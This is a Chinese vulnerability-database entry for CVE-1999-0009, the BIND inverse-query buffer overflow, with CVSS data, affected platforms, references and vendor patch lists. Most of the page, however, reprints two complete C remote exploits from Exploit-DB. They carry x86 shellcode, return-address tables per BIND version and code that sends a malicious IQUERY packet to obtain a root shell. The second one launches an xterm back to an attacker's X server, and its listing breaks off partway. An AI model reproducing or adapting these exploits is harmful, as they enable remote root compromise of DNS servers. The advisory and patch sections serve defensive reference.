CVE-1999-0009
CVSS10.0
发布时间 :1998-04-08 00:00:00
修订时间 :2008-09-09 08:33:31
NMCOE    

[原文]Inverse query buffer overflow in BIND 4.9 and BIND 8 Releases.


[CNNVD]多家厂商BIND iquery远程缓冲区溢出漏洞(CNNVD-199804-012)

        
        BIND是一种被广泛应用的DNS服务器程序,由Internet Software Consortium开发维护。
        低于4.9.7和8.1.2的BIND版本中在处理反向查询时存在一个严重的缓冲区溢出漏洞,远程攻击者可能利用此漏洞在主机上以root用户的权限执行任意指令。
        当req_iquery()函数在处理一个反向域名解析请求时,如果用户提供超长的数据,将导致发生堆栈溢出,远程攻击者可能通过溢出攻击获取主机的root用户权限。这个漏洞影响所有使用有问题BIND版本的系统,而且已经有很多攻击程序流传开来。
        <*链接:http://www.cert.org/advisories/CA-1998-05.html
         ftp://patches.sgi.com/support/free/security/advisories/19980603-01-PX
         ftp://patches.sgi.com/support/free/security/advisories/19980603-02-PX
         ftp://ftp.auscert.org.au/pub/auscert/ESB/ESB-98.137
         http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/180&type=0&nav=sec.sba
        *>

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sgi:irix:4.0.1SGI IRIX 4.0.1
cpe:/o:netbsd:netbsd:1.1NetBSD 1.1
cpe:/o:sun:solaris:2.5::x86
cpe:/o:redhat:linux:4.1Red Hat Linux 4.1
cpe:/a:data_general:dg_ux:5.4_3.1
cpe:/o:bsdi:bsd_os:2.1
cpe:/o:sgi:irix:5.2SGI IRIX 5.2
cpe:/o:ibm:aix:4.1.4IBM AIX 4.1.4
cpe:/o:sgi:irix:6.0SGI IRIX 6.0
cpe:/o:sgi:irix:4.0.5aSGI IRIX 4.0.5A
cpe:/o:sun:solaris:2.4
cpe:/o:netbsd:netbsd:1.3NetBSD 1.3
cpe:/o:sgi:irix:4.0.5_iopSGI IRIX 4.0.5 IOP
cpe:/o:ibm:aix:4.1.3IBM AIX 4.1.3
cpe:/o:sun:solaris:2.5.1::ppc
cpe:/o:sgi:irix:6.3SGI IRIX 6.3
cpe:/o:netbsd:netbsd:1.2NetBSD 1.2
cpe:/o:sgi:irix:4.0.5fSGI IRIX 4.0.5F
cpe:/o:netbsd:netbsd:1.3.1NetBSD 1.3.1
cpe:/o:sgi:irix:3.3.2
cpe:/o:sgi:irix:4.0.5dSGI IRIX 4.0.5D
cpe:/o:sun:solaris:2.3
cpe:/o:sco:open_desktop:3.0
cpe:/o:ibm:aix:4.2.1IBM AIX 4.2.1
cpe:/o:sgi:irix:4.0.4tSGI IRIX 4.0.4T
cpe:/o:sgi:irix:5.0.1SGI IRIX 5.0.1
cpe:/o:sgi:irix:6.2SGI IRIX 6.2
cpe:/o:sgi:irix:4.0.4SGI IRIX 4.0.4
cpe:/a:data_general:dg_ux:5.4_4.1
cpe:/o:sgi:irix:4.0.5gSGI IRIX 4.0.5G
cpe:/o:sgi:irix:4.0.1tSGI IRIX 4.0.1T
cpe:/o:sgi:irix:5.1SGI IRIX 5.1
cpe:/o:sgi:irix:3.3.1
cpe:/o:ibm:aix:4.2IBM AIX 4.2
cpe:/o:redhat:linux:5.0Red Hat Linux 5.0
cpe:/o:sgi:irix:4.0
cpe:/a:data_general:dg_ux:5.4_3.0
cpe:/a:data_general:dg_ux:5.4_4.11
cpe:/o:sgi:irix:6.1SGI IRIX 6.1
cpe:/o:sgi:irix:4.0.2SGI IRIX 4.0.2
cpe:/o:sgi:irix:3.3
cpe:/o:sgi:irix:5.0
cpe:/o:sun:solaris:2.5
cpe:/o:sco:unixware:2.1
cpe:/o:redhat:linux:4.2Red Hat Linux 4.2
cpe:/o:sun:solaris:2.6
cpe:/o:sgi:irix:4.0.5eSGI IRIX 4.0.5E
cpe:/o:ibm:aix:4.1.2IBM AIX 4.1.2
cpe:/o:sco:unixware:7.0
cpe:/o:sgi:irix:4.0.4bSGI IRIX 4.0.4B
cpe:/o:bsdi:bsd_os:2.0
cpe:/o:sun:solaris:2.5.1
cpe:/o:sco:open_desktop:5.0
cpe:/o:ibm:aix:4.3IBM AIX 4.3
cpe:/a:isc:bind:8.1ISC BIND 8.1
cpe:/o:ibm:aix:4.1.5IBM AIX 4.1.5
cpe:/o:sun:solaris:2.6::x86
cpe:/o:bsdi:bsd_os:2.0.1
cpe:/o:sgi:irix:3.3.3
cpe:/a:isc:bind:8.1.1ISC BIND 8.1.1
cpe:/o:sgi:irix:4.0.5hSGI IRIX 4.0.5H
cpe:/o:netbsd:netbsd:1.2.1NetBSD 1.2.1
cpe:/o:netbsd:netbsd:1.0NetBSD 1.0
cpe:/o:redhat:linux:4.0Red Hat Linux 4.0
cpe:/o:caldera:openlinux:1.0
cpe:/o:sgi:irix:4.0.5SGI IRIX 4.0.5
cpe:/o:nec:asl_ux_4800:64
cpe:/o:sgi:irix:4.0.3SGI IRIX 4.0.3
cpe:/o:sgi:irix:3.2
cpe:/o:sgi:irix:5.1.1SGI IRIX 5.1.1
cpe:/o:sgi:irix:5.3SGI IRIX 5.3
cpe:/o:ibm:aix:4.1IBM AIX 4.1
cpe:/a:isc:bind:4.9.6ISC BIND 4.9.6
cpe:/o:sun:solaris:2.5.1::x86
cpe:/o:sgi:irix:4.0.5_ipr
cpe:/o:ibm:aix:4.1.1IBM AIX 4.1.1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:6051Security vulnerability in the BIND executable
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0009
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0009
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199804-012
(官方数据源) CNNVD

- 其它链接及资源

http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9808-083
(UNKNOWN)  HP  HPSBUX9808-083
http://www.securityfocus.com/bid/134
(UNKNOWN)  BID  134
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/180
(UNKNOWN)  SUN  00180
ftp://patches.sgi.com/support/free/security/advisories/19980603-01-PX
(UNKNOWN)  SGI  19980603-01-PX

- 漏洞信息

多家厂商BIND iquery远程缓冲区溢出漏洞
危急 其他
1998-04-08 00:00:00 2005-05-02 00:00:00
远程  
        
        BIND是一种被广泛应用的DNS服务器程序,由Internet Software Consortium开发维护。
        低于4.9.7和8.1.2的BIND版本中在处理反向查询时存在一个严重的缓冲区溢出漏洞,远程攻击者可能利用此漏洞在主机上以root用户的权限执行任意指令。
        当req_iquery()函数在处理一个反向域名解析请求时,如果用户提供超长的数据,将导致发生堆栈溢出,远程攻击者可能通过溢出攻击获取主机的root用户权限。这个漏洞影响所有使用有问题BIND版本的系统,而且已经有很多攻击程序流传开来。
        <*链接:http://www.cert.org/advisories/CA-1998-05.html
         ftp://patches.sgi.com/support/free/security/advisories/19980603-01-PX
         ftp://patches.sgi.com/support/free/security/advisories/19980603-02-PX
         ftp://ftp.auscert.org.au/pub/auscert/ESB/ESB-98.137
         http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/180&type=0&nav=sec.sba
        *>

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 没有合适的临时解决方法。
        厂商补丁:
        HP
        --
        HP已经为此发布了一个安全公告(HPSBUX9808-083)以及相应补丁:
        HPSBUX9808-083:Security Vulnerability in BIND on HP-UX
        链接:
        补丁下载:
        ftp://us-ffs.external.hp.com/hp-ux_patches
        操作系统及补丁号:
        HP-UX release 9.0, 9.01, 9.03, 9.04, 9.05, & 9.07: PHNE_13187
        HP-UX release 10.00, 10.01, 10.10 and 10.20: PHNE_14617
        --->>> HP-UX release 10.16: *PHNE_16232
        HP-UX release 10.24: **PHNE_16204
        HP-UX release 11.00: PHNE_12957
        SGI
        ---
        SGI已经为此发布了一个安全公告(19980603-01-PX)以及相应补丁:
        19980603-01-PX:IRIX BIND DNS Vulnerabilities
        链接:ftp://patches.sgi.com/support/free/security/advisories/19980603-01-PX
        补丁下载:
        
        http://support.sgi.com/

        ftp://patches.sgi.com/support/patchset/
        补丁情况:
        系统版本 是否受影响 补丁号
        ---------- ----------- ---------
        IRIX 3.x yes not avail
        IRIX 4.x yes not avail
        IRIX 5.0.x yes not avail
        IRIX 5.1.x yes not avail
        IRIX 5.2 yes not avail
        IRIX 5.3 yes 3123
        IRIX 6.0.x yes not avail
        IRIX 6.1 yes not avail
        IRIX 6.2 yes 3117
        IRIX 6.3 yes 2740
        IRIX 6.4 yes 2741
        IRIX 6.5 no
        Sun
        ---
        Sun已经为此发布了一个安全公告(Sun-00180)以及相应补丁:
        Sun-00180:BIND
        链接:
        http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/180&type=0&nav=sec.sba

        补丁下载:
        
        http://sunsolve.sun.com/sunsolve/pubpatches/patches.html

        操作系统版本及对应的补丁号:
        操作系统 补丁号
        _________________ _________
        Solaris 2.6 105755-07
        Solaris 2.6_x86 105756-07
        Solaris 2.5.1 103663-15
        Solaris 2.5.1_x86 103664-15
        Solaris 2.5 103667-11
        Solaris 2.5_x86 103668-11
        Solaris 2.4 102479-13
        Solaris 2.4_x86 102480-11
        Solaris 2.3 101359-10
        SunOS 4.1.4 106866-02
        SunOS 4.1.3_U1 106865-02

- 漏洞信息 (19111)

BSDI BSD/OS <= 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX <= 5.4 4.11,IBM AIX <= 4.3,ISC BIND <= 8.1.1,NetBSD <= 1.3.1,RedHat Linux <= 5.0,SCO Open Desktop 3.0/Server 5.0,Unixware 2.1/7.0,SGI IRIX <= 6.3,Solaris <= 2.5.1 BIND buffer overflow(1) (EDBID:19111)
linux remote
1998-04-08 Verified
0 ROTShB
N/A [点击下载]
source: http://www.securityfocus.com/bid/134/info

A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host.

Exploits for this vulnerability are very widespread, and were posted to the Bugtraq mailing list.

/*
 * have fun.
 * -ROTShB
 */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>

#define DEFAULT_TARGET       0
#define DEFAULT_OPTIMIZATION 0
#define DEFAULT_ANBUF_OFFSET 300
#define DLEN_VAL             4
#define NPACKETSZ            512
#define NMAXDNAME            1025
#define PRE_EGG_DATALEN      (1+(sizeof(short)*3)+sizeof(long))
#define ALEN_VAL             (DLEN_VAL+PRE_EGG_DATALEN)
#define BUFFSIZE             4096

struct target_type
{
  char          desc[40];
  int           systype;
  unsigned long addr;
  unsigned long opt_addr;
  int           fd;
};

struct target_type target[] =
{
  {"x86 Linux 2.0.x named 4.9.5-REL (se)",0,0xbffff21c,0xbffff23c,4},
  {"x86 Linux 2.0.x named 4.9.5-REL (le)",0,0xbfffeedc,0xbfffeefc,4},
  {"x86 Linux 2.0.x named 4.9.5-P1 (se)",0,0xbffff294,0xbffff2cc,4},
  {"x86 Linux 2.0.x named 4.9.5-P1 (le)",0,0xbfffef8c,0xbfffefb4,4},
  {"x86 Linux 2.0.x named 4.9.6-REL (se)",0,0xbffff3e3,0xbffff403,4},
  {"x86 Linux 2.0.x named 4.9.6-REL (le)",0,0xbffff188,0xbffff194,4},
  {"x86 Linux 2.0.x named 8.1-REL (se)",0,0xbffff6a4,0xbffff6f8,5},
  {"x86 Linux 2.0.x named 8.1-REL (le)",0,0xbffff364,0xbffff3b8,5},
  {"x86 Linux 2.0.x named 8.1.1 (se)",0,0xbffff6b8,0xbffff708,5},
  {"x86 Linux 2.0.x named 8.1.1 (le)",0,0xbffff378,0xbffff3c8,5},
  {"x86 FreeBSD 3.x named 4.9.5-REL (se)",1,0xefbfd260,0xefbfd2c8,4},
  {"x86 FreeBSD 3.x named 4.9.5-REL (le)",1,0xefbfd140,0xefbfd1a8,4},
  {"x86 FreeBSD 3.x named 4.9.5-P1 (se)",1,0xefbfd260,0xefbfd2c8,4},
  {"x86 FreeBSD 3.x named 4.9.5-P1 (le)",1,0xefbfd140,0xefbfd1a8,4},
  {"x86 FreeBSD 3.x named 4.9.6-REL (se)",1,0xefbfd480,0xefbfd4e8,4},
  {"x86 FreeBSD 3.x named 4.9.6-REL (le)",1,0xefbfd218,0xefbfd274,4},
  {{0},0,0,0,0}
};

unsigned long resolve(char *host)

{
  long i;
  struct hostent *he;

  if((i=inet_addr(host))==(-1))
    if((he=gethostbyname(host))==NULL)
      return(0);
    else
      return(*(unsigned long *)he->h_addr);

  return(i);
}

int send_packet(int fd, char *buff, int len)
{
  char tmp[2], *ptr=tmp;

  PUTSHORT(len,ptr);

  if(write(fd,tmp,2)!=2)
    return(-1);

  if(write(fd,buff,len)!=len)
    return(-1);

  return(1);
}

int attack(int fd, struct target_type t, unsigned long offset, int optimized)
{
  char buff[BUFFSIZE], *ptr=buff;
  HEADER *dnsh=(HEADER *)buff;
  unsigned long i;
  int dlen, len=0;

  (void)memset(dnsh,0,sizeof(HEADER));

  dnsh->id      = htons(31337);
  dnsh->opcode  = IQUERY;
  dnsh->rd      = 1;
  dnsh->ra      = 1;
  dnsh->ancount = htons(1);

  ptr += sizeof(HEADER);
  len += sizeof(HEADER);

  *ptr = '\0';
  ptr++;

  i = T_A;
  PUTSHORT(i,ptr);

  i = C_IN;
  PUTSHORT(i,ptr);

  i = 31337;
  PUTLONG(i,ptr);

  if(t.systype==0)
    {
      char c0de[] =
        "\x31\xc0\xb0\x3f\x31\xdb\xb3\xff\x31\xc9\xcd\x80\x31\xc0\xb0\x3f\xb1"
        "\x01\xcd\x80\x31\xc0\xb0\x3f\xb1\x02\xcd\x80\xeb\x24\x5e\x8d\x1e\x89"
        "\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10"
        "\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7"
        "\xff\xff\xff/bin/sh";

      if(optimized)
        dlen = NPACKETSZ+(NMAXDNAME+3)+8-PRE_EGG_DATALEN;
      else
        dlen = NPACKETSZ+(NMAXDNAME+3)+(sizeof(int)*6)+8-PRE_EGG_DATALEN;

      PUTSHORT(dlen,ptr);
      len += PRE_EGG_DATALEN;

      c0de[7] = t.fd;

      (void)memset(ptr,0x90,(sizeof(buff)-(ptr-buff)));

      i = NPACKETSZ-PRE_EGG_DATALEN-sizeof(c0de);
      (void)memcpy((ptr+i),c0de,sizeof(c0de));

      if(!optimized)
        {
          (void)memcpy((ptr+(dlen-16-sizeof(c0de))),c0de,sizeof(c0de));
          i = ALEN_VAL;
          (void)memcpy((ptr+(dlen-16)),&i,sizeof(i));
          i = DLEN_VAL;
          (void)memcpy((ptr+(dlen-12)),&i,sizeof(i));
        }
      else
        (void)memcpy((ptr+(dlen-4-sizeof(c0de))),c0de,sizeof(c0de));

      i = (optimized?t.opt_addr:t.addr)+offset;

      len += dlen;
    }


  else if(t.systype==1)
    {
      char c0de[] =
        "\xeb\x6e\x5e\xc6\x06\x9a\x31\xc9\x89\x4e\x01\xc6\x46\x05\x07\x88"
        "\x4e\x06\x51\x31\xdb\xb3\x04\x53\x66\xc7\x46\x07\xeb\xa7\x31\xc0"
        "\xb0\x5a\x50\xeb\x50\xfe\xc1\x51\x53\xc6\x46\x08\xb6\x31\xc0\xb0"
        "\x5a\x50\xeb\x41\xfe\xc1\x51\x53\xc6\x46\x08\xc5\x31\xc0\xb0\x5a"
        "\x50\xeb\x32\xc7\x46\x07\x2f\x62\x69\x6e\xc7\x46\x0b\x2f\x73\x68"
        "\x21\x31\xc0\x88\x46\x0e\x8d\x5e\x07\x89\x5e\x0f\x89\x46\x13\x8d"
        "\x5e\x13\x53\x8d\x5e\x0f\x53\x8d\x5e\x07\x53\xb0\x3b\x50\xeb\x05"
        "\xe8\x8d\xff\xff\xff";

      if(optimized)
        dlen = NPACKETSZ+(NMAXDNAME+3)+8-PRE_EGG_DATALEN;
      else
        dlen = NPACKETSZ+(NMAXDNAME+3)+(sizeof(int)*6)+8-PRE_EGG_DATALEN;

      PUTSHORT(dlen,ptr);
      len += PRE_EGG_DATALEN;

      c0de[22] = t.fd;

      (void)memset(ptr,0x90,(sizeof(buff)-(ptr-buff)));

      i = NPACKETSZ-PRE_EGG_DATALEN-sizeof(c0de);
      (void)memcpy((ptr+i),c0de,sizeof(c0de));

      if(!optimized)
        {
          (void)memcpy((ptr+(dlen-16-sizeof(c0de))),c0de,sizeof(c0de));
          i = ALEN_VAL;
          (void)memcpy((ptr+(dlen-16)),&i,sizeof(i));
          i = DLEN_VAL;
          (void)memcpy((ptr+(dlen-12)),&i,sizeof(i));
        }
      else
        (void)memcpy((ptr+(dlen-4-sizeof(c0de))),c0de,sizeof(c0de));

      i = (optimized?t.opt_addr:t.addr)+offset;
      (void)memcpy((ptr+(dlen-4)),&i,sizeof(i));

      len += dlen;
    }
  else
    return(0);

  return(send_packet(fd,buff,len));
}

int main(int argc, char *argv[])
{
  char xbuf[128], ybuf[128];
  unsigned long offset=DEFAULT_ANBUF_OFFSET;
  int ti, opt=DEFAULT_OPTIMIZATION, sock, i;
  int xlen=0, ylen=0;
  fd_set rd, wr;
  struct sockaddr_in sa;

  for(i=0;((target[i].addr)||(target[i].opt_addr));i++);

  if(argc<2)
    {
      (void)fprintf(stderr,"\ntarget types:\n");

      for(ti=0;ti<i;ti++)
        (void)fprintf(stderr," %-2d : %s\n",ti,target[ti].desc);

      (void)fprintf(stderr,"\nerror: usage: %s <host> [tt] [opt] [ofst]\n",
                    argv[0]);
      exit(-1);
    }

  if(argc>2)
    {
      ti = atoi(argv[2]);
      if((ti<0)||(ti>i))
        {
          (void)fprintf(stderr,"error: invalid target type %d\n",ti);
          exit(-1);
        }
    }
  else
    ti = DEFAULT_TARGET;

  if(argc>3)
    {
      opt = atoi(argv[3]);
      if((opt!=0)&&(opt!=1))
        {
          (void)fprintf(stderr,"error: invalid optimization setting %d\n",opt);
          exit(-1);
        }
    }

  if(argc>4)
    offset = atoi(argv[4]);


  if(!(sa.sin_addr.s_addr=resolve(argv[1])))
    {
      (void)fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
      exit(-1);
    }

  sa.sin_family = AF_INET;
  sa.sin_port   = htons(53);

  if((sock=socket(sa.sin_family,SOCK_STREAM,0))==(-1))
    {
      (void)perror("error: socket");
      exit(-1);
    }

  if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
    {
      (void)perror("error: connect");
      exit(-1);
    }

  (void)printf("target             : %s\n",inet_ntoa(sa.sin_addr));
  (void)printf("target type        : %s\n",target[ti].desc);
  (void)printf("optimized named    : %s\n",(opt?"YES":"NO"));
  (void)printf("anbuff addr        : 0x%x\n",(unsigned int)
               (i=(opt?target[ti].opt_addr:target[ti].addr)));
  (void)printf("anbuff addr offset : %lu\n",offset);
  (void)printf("ret addr           : 0x%x\n",(unsigned int)(i+offset));
  (void)printf("fd to make dups of : %d\n",target[ti].fd);

  (void)printf("here we go...\n");

  switch(attack(sock,target[ti],offset,opt))
    {
    case -1:
      (void)perror("error: attack");
      exit(-1);
      break;

    case 0:
      (void)fprintf(stderr,"error: internal error\n");
      exit(-1);
      break;
    }

  (void)printf("have fun.\n");
  (void)printf("-ROTShB\n");

  while(1)
    {
      FD_ZERO(&rd);
      if(ylen<(sizeof(ybuf)-1))
        FD_SET(sock,&rd);
      if(xlen<(sizeof(xbuf)-1))
        FD_SET(fileno(stdin),&rd);

      FD_ZERO(&wr);
      if(xlen)
        FD_SET(sock,&wr);
      if(ylen)
        FD_SET(fileno(stdout),&wr);

      if((ti=select((sock+1),&rd,&wr,NULL,NULL))==(-1))
        {
          (void)perror("error: select");
          break;
        }

      if(FD_ISSET(fileno(stdin),&rd))
        {
          if((i=read(fileno(stdin),(xbuf+xlen),(sizeof(xbuf)-xlen)))==(-1))
            {
              (void)perror("error: read");
              exit(-1);
            }
          else if(i==0)
            break;

          xlen += i;
          if(!(--ti)) continue;
        }


      if(FD_ISSET(sock,&wr))
        {
          if(write(sock,xbuf,xlen)!=xlen)
            {
              (void)perror("error: write");
              exit(-1);
            }

          xlen = 0;
          if(!(--ti)) continue;
        }

      if(FD_ISSET(sock,&rd))
        {
          if((i=read(sock,(ybuf+ylen),(sizeof(ybuf)-ylen)))==(-1))
            {
              (void)perror("error: read");
              exit(-1);
            }
          else if(i==0)
            break;

          ylen += i;
          if(!(--ti)) continue;
        }

      if(FD_ISSET(fileno(stdout),&wr))
        {
          if(write(fileno(stdout),ybuf,ylen)!=ylen)
            {
              (void)perror("error: write");
              exit(-1);
            }

          ylen = 0;
          if(!(--ti)) continue;
        }
    }

  if(close(sock)==(-1))
    {
      (void)perror("error: close");
      exit(-1);
    }

  exit(0);
}		

- 漏洞信息 (19112)

BSDI BSD/OS <= 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX <= 5.4 4.11,IBM AIX <= 4.3,ISC BIND <= 8.1.1,NetBSD <= 1.3.1,RedHat Linux <= 5.0,SCO Open Desktop 3.0/Server 5.0,Unixware 2.1/7.0,SGI IRIX <= 6.3,Solaris <= 2.5.1 BIND buffer overflow(2) (EDBID:19112)
linux remote
1998-04-08 Verified
0 prym
N/A [点击下载]
source: http://www.securityfocus.com/bid/134/info
 
A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host.
 
Exploits for this vulnerability are very widespread, and were posted to the Bugtraq mailing list.

/*
 * z, thnx.
 * ganked the xterm exec from adm, thnx.
 * have fun.
 * -prym
 */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>

#define REMOTE
#define DEFAULT_ANBUF_OFFSET 300
#define DEFAULT_TARGET 0
#define DEFAULT_OPTIMIZED 0
#define DLEN_VAL 4
#define PRE_OF_DATALEN (1+(sizeof(short)*3)+sizeof(long))
#define ALEN_VAL (DLEN_VAL+PRE_OF_DATALEN)
#define EVILSPACE (PACKETSZ-PRE_OF_DATALEN)
#define RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+(sizeof(int)*6)+4-PRE_OF_DATALEN)
#define OPT_RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+4-PRE_OF_DATALEN)

struct target_type
{
  char desc[40];
  int systype;
  unsigned long addr;
  unsigned long opt_addr;
};

struct target_type target[] =
{
  {"x86 Linux 2.0.x named 4.9.5-P1",0,0xbfffef8c,0xbfffefb4},
  {"x86 Linux 2.0.x named 4.9.6-REL",0,0xbffff188,0xbffff194},
  {"x86 Linux 2.0.x named 8.1-REL",0,0xbffff3f0,0xbffff44c},
  {"x86 Linux 2.0.x named 8.1.1",0,0xbffff404,0xbffff45c},
  {"x86 Linux 2.0.x RH 4.2 named 4.9.5-P1",0,0,0xbfffeff8},
  {{0},0,0,0}
};

unsigned long resolve(char *host)
{
  long i;
  struct hostent *he;

  if((i=inet_addr(host))<0)
    if((he=gethostbyname(host))==NULL)
      return(0);
    else
      return(*(unsigned long *)he->h_addr);

  return(i);
}

int send_packet(int fd, char *buff, int len)
{
  char tmp[2], *ptr=tmp;

  PUTSHORT(len,ptr);
  if(write(fd,tmp,2)!=2)
    return(-1);

  if(write(fd,buff,len)!=len)
    return(-1);

  return(1);
}

int attack(int fd, struct in_addr us, struct target_type t,
	   unsigned long offset, int optimized)
{
  char buff[sizeof(HEADER)+PRE_OF_DATALEN+RET_FROM_1NOP+4], *ptr=buff;
  HEADER *dnsh=(HEADER *)buff;
  unsigned long i;
  int dlen, len=0, al=ALEN_VAL, dl=DLEN_VAL;

  memset(dnsh,0,sizeof(HEADER));
  dnsh->id = htons(31337);
  dnsh->opcode = IQUERY;
  dnsh->rd = 1;
  dnsh->ra = 1;
  dnsh->ancount = htons(1);
  ptr += sizeof(HEADER);
  len += sizeof(HEADER);

  *ptr = '\0';
  ptr++;
  PUTSHORT(T_A,ptr);
  PUTSHORT(C_IN,ptr);
  PUTLONG(31337,ptr);
  dlen = (optimized?OPT_RET_FROM_1NOP:RET_FROM_1NOP)+4;
  PUTSHORT(dlen,ptr);
  len += PRE_OF_DATALEN;

  memset(ptr,'X',(sizeof(buff)-(ptr-buff)));

  if(t.systype==0)
    {
#ifdef REMOTE
      char c1[] =
	"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
	"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
	"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
	"\x80\xe8\xcc\xff\xff\xff";
      char c2[] =
	"/usr/bin/X11/xterm\xff-display\xff";
      char c3[32];
      char c4[] =
	"\xfe\xe8\xb1\xff\xff\xff";

      snprintf(c3,sizeof(c3),"%s:0\xff-e\xff/bin/sh\xff",inet_ntoa(us));

      c1[4] = (unsigned char)0x32+strlen(c2)+strlen(c3);
      c4[2] = (unsigned char)0xc9-strlen(c2)-strlen(c3);

      i = EVILSPACE-strlen(c1)-strlen(c2)-strlen(c3)-strlen(c4);

      memset(ptr,0x90,i);
      memcpy((ptr+i),c1,strlen(c1));
      memcpy((ptr+i+strlen(c1)),c2,strlen(c2));
      memcpy((ptr+i+strlen(c1)+strlen(c2)),c3,strlen(c3));
      memcpy((ptr+i+strlen(c1)+strlen(c2)+strlen(c3)),c4,strlen(c4));
#else
      char c0de[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hi";
      int i = EVILSPACE-strlen(c0de);

      memset(ptr,0x90,i);
      memcpy((ptr+i),c0de,strlen(c0de));
#endif
    }
  else
    return(0);

  if(!optimized)
    {
      memcpy((ptr+(dlen-16)),&al,sizeof(al));
      memcpy((ptr+(dlen-12)),&dl,sizeof(dl));
    }

  i = (optimized?t.opt_addr:t.addr)+offset;
  memcpy((ptr+(dlen-4)),&i,sizeof(i));
  len += dlen;

  return(send_packet(fd,buff,len));
}

int main(int argc, char *argv[])
{
  unsigned long offset=DEFAULT_ANBUF_OFFSET;
  int target_index=DEFAULT_TARGET, optimized=DEFAULT_OPTIMIZED, sock, i;
  struct sockaddr_in sa;
  struct in_addr xs;

  for(i=0;target[i].desc[0];i++);

  if(argc<3)
    {
      fprintf(stderr,"\ntarget types:\n");
      fprintf(stderr," %-2s : %-12s - %-12s - %s\n","tt","anbuf","opt anbuf",
	      "description");
      for(target_index=0;target_index<i;target_index++)
	fprintf(stderr," %-2d : 0x%-10x - 0x%-10x - %s\n",target_index,
		(unsigned int)target[target_index].addr,
		(unsigned int)target[target_index].opt_addr,
		target[target_index].desc);
      fprintf(stderr,
	      "\nerror: usage: %s <target> <X server> [tt] [opt] [offset]\n",
	      argv[0]);
      exit(-1);
    }

  if((argc>3)&&((target_index=atoi(argv[3]))>=i))
    {
      fprintf(stderr,"error: invalid target type %d\n",target_index);
      exit(-1);
    }

  if((target[target_index].addr==0)&&(target[target_index].opt_addr==0))
    {
      fprintf(stderr,"error: internal error\n");
      exit(-1);
    }

  if(argc>4)
    {
      optimized = atoi(argv[4]);
      if((optimized!=0)&&(optimized!=1))
	{
	  fprintf(stderr,"error: invalid optimization setting %d\n",optimized);
	  exit(-1);
	}
    }

  if((optimized==0)&&(target[target_index].addr==0))
    optimized = 1;

  if((optimized==1)&&(target[target_index].opt_addr==0))
    optimized = 0;

  if(argc>5)
    offset = atoi(argv[5]);

  if(!(xs.s_addr=resolve(argv[2])))
    {
      fprintf(stderr,"error: can not resolve: %s\n",argv[2]);
      exit(-1);
    }

  if(!(sa.sin_addr.s_addr=resolve(argv[1])))
    {
      fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
      exit(-1);
    }

  sa.sin_family = AF_INET;
  sa.sin_port = htons(53);

  if((sock=socket(sa.sin_family,SOCK_STREAM,IPPROTO_TCP))==(-1))
    {
      perror("error: socket");
      exit(-1);
    }

  if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
    {
      perror("error: connect");
      exit(-1);
    }

  printf("target             : %s\n",inet_ntoa(sa.sin_addr));
  printf("target type        : %s\n",target[target_index].desc);
  printf("optimized named    : %s\n",(optimized?"YES":"NO"));
  printf("anbuff addr        : 0x%x\n",(unsigned int)
	 (optimized?target[target_index].opt_addr:target[target_index].addr));
